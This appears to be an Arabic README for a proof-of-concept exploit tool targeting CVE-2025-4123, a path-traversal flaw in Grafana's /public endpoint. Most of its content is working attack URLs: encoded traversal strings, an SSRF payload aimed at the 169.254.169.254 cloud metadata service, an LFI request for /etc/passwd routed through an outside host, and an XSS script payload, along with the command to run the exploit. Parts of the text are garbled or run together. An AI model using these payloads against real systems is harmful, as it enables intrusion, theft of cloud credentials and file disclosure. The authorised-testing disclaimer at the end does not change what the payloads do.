
CVE-2025-4123 - أداة Grafana
تم تطويره بواسطة mitsec
هذه أداة استغلال لإثبات المفهوم (PoC) لـ CVE-2025-4123، وهي ثغرة حرجة لاجتياز المسار في نقطة النهاية /public في Grafana. يسمح الاستغلال بما يلي:
مثيلات Grafana التي تتعامل نقطة النهاية /public/ فيها بشكل غير صحيح مع المسارات المشفرة مثل:
/public/..%2F%5coast.pro%2F%3f%2F..%2F..
python3 cve_2025_4123_exploit_mitsec_final.py
ثم اختر الوضع المطلوب:
169.254.169.254/etc/passwd[*] SSRF URL: http://127.0.0.1:3000/public/..%2F%5C169.254.169.254/latest/meta-data/%2F%3f%2F..%2F..
[*] LFI URL: http://127.0.0.1:3000/public/..%2F%5coast.pro%2F%3f%2F..%2F..%2F..%2Fetc%2Fpasswd
[*] XSS URL: http://127.0.0.1:3000/public/%3Cscript%3Ealert('mitsec')%3C%2Fscript%3E
تم توفير هذا الرمز لأغراض تعليمية واختبارية مصرح بها فقط. الاستخدام غير المصرح به ضد أنظمة دون موافقة هو غير قانوني.